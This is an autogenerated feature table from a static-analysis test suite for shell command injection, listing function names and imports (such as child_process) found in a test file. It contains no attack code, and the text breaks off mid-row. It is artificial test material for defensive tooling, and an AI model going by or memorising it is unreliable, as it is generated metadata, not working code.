autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:275:18 | module.exports.Foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:275:18 | module.exports.Foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:275:18 | module.exports.Foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:283:1 | module. ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:283:1 | module. ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:283:1 | module. ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:8:275:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:8:275:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:8:275:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:16:275:18 | Foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:16:275:18 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:16:275:18 | Foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:22:283:1 | class F ... OK\\n\\t}\\n} | assignedToPropName | Foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:22:283:1 | class F ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:22:283:1 | class F ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:22:283:1 | class F ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:28:275:30 | Foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:28:275:30 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:28:275:30 | Foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | 'arguments' object of default constructor of class Foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | 'arguments' object of default constructor of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | 'arguments' object of default constructor of class Foo | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | 'arguments' object of default constructor of class Foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | () {} | assignedToPropName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | () {} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | () {} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | () {} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | constructor | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | constructor | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | constructor | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | constructor() {} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | constructor() {} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | constructor() {} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | constructor() {} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | constructor() {} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | constructor() {} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | exceptional return of default constructor of class Foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | exceptional return of default constructor of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | exceptional return of default constructor of class Foo | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | exceptional return of default constructor of class Foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | return of default constructor of class Foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | return of default constructor of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | return of default constructor of class Foo | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | return of default constructor of class Foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | this | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:32:275:31 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:2:276:6 | start | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:2:276:6 | start | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:2:276:6 | start | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:2:282:2 | start(o ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:2:282:2 | start(o ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:2:282:2 | start(o ... T OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:2:282:2 | start(o ... T OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:2:282:2 | start(o ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:2:282:2 | start(o ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:276:7:276:6 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 